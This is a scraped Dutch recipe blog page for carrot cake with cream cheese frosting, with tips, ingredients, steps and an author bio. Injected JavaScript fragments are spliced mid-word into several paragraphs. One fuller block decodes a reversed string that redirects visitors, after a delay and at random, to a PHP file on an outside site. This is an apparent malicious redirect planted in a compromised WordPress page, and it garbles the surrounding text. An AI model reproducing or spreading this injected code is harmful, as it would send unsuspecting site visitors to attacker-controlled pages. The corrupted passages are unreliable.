Worteltaart met roomkaasglazuur

Worteltaart is echt mijn favoriete taart ooit. De naam is een beetje verwarrend, omdat je verwacht dat deze taart heel erg naar wortelen smaakt en zelfs misschien hartig is in plaats van zoet. Het tegenovergestelde is waar, want deze heerlijke taart heeft een zoete, kruidige smaak en is geweldig als dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toetje of voor bij de koffie.

Worteltaart?

Met deze worteltaart heb ik al zo veel mensen verrast. Altijd al ze vragen: ‘Wat is dat voor taart’ en je zegt ‘worteltaart’, dan krijg je best wel verbaasde blikken. Ik dacht dat het ook in Nederland wel een bekende taart was, maar niets is minder waar. Het leuke is wel dat als ze hem één keer geproefd hebben ze vaak wel overtuigd zijn dat het echt heel lekker is…

Met een twist…

Je kunt natuurlijk altijd improviseren met het recept. Houd je niet van rozijnen dan laat je deze achterwegen. Ook kun je de taart juist een extra twist geven, bijvoorbeeld als je hem als nagerecht wil serveren. Je kunt bijvoorbeeld een paar scheuten sinaasappel likeur over de taart sprenkelen nadat hij is afgebakken zodat het deeg de likeur absorbeert. Je kunt de likeur ook door het wortelmengsel roeren en mee bakken.

Voor echte roomkaas-fans

Vind je de roomkaas boven op de worteltaart ook zo lekker? Je kan natuurlijk de taart met een ijzerdraadje of een broodmes door midden snijden en nog een extra roomkaas laag dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegen. Je kunt er voor kiezen de tussenlaag iets minder zoet te maken dan de bovenste laag. Dit doe je door minder poedersuiker te gebruiken.

Voor het oog

Vaak zie je op worteltaarten decoratie van marsepein of fondant in de vorm van een wortel. Als je nu echt creatief bent kun je natuurlijk wat worteltjes boetseren en deze over de buitenrand van de taart verspreiden zodat elke stukje een marsepeinen worteltje heeft. Heb je minder geduld dan kun je ook alleen in het midden een grote wortel van marsepein maken.

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”4″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”” wrap=”” img_size=”300×300″]

My Recipe

Voorbereiding: 30 min.
Oven: 25 min.

Ingredienten

 • 250 gram wortelen
 • Sinaasappelrasp (ongeveer een halve sinaasappel)
 • 200 gram roomboter
 • 150 gram suiker
 • 250 gram sultana rozijnen
 • 2 eieren
 • 200 gram zelfrijzend bakmeel
 • 150 gram walnoten
 • 100 gram poedersuiker
 • 250 gram roomkaas naturel
 • 100 gram slagroom

Aan de slag!

 1. Schil de wortelen en rasp deze fijn. Zelf gebruik ik eigenlijk altijd een keukenmachine om de wortelen fijn te malen.
 2. Voeg bij de wortelen de suiker, de rozijnen en de rasp van ongeveer een halve sinaasappel.
 3. Hak de walnoten fijn (keukenmachine) en voeg deze ook aan het mengsel toe.
 4. Mix nu de boter met de eieren goed samen.
 5. Voeg vervolgens het zelfrijzend bakmiddel toe en mix het mengsel tot een deeg. Gebruik hier een mixer voor die geschikt is voor het kneden van deeg.
 6. Je kunt nu het wortelmengsel aan het deeg toevoegen en nog een keer goed mixen.
 7. Giet het deeg in een ingevette springvorm en bak de taart af gedurende 25 min in een voorverwarmde oven van 185°C. Als de taart te donker wordt kun je deze afdekken met aluminiumfolie.
 8. Voor het roomkaasmengsel meng je de poedersuiker, slagroom en de roomkaas door elkaar heen. Je kunt dit zo zoet maken als je zelf wilt. Laat de taart goed afkoelen voordat je het roomkaasmengsel over de taart giet anders smelt het.
 9. Smeer de taart in met het roomkaasmengsel en garneer de taart met walnoten.

Score

 • Score 5.0

User Rating

5 (2 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Worteltaart met roomkaasglazuur"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.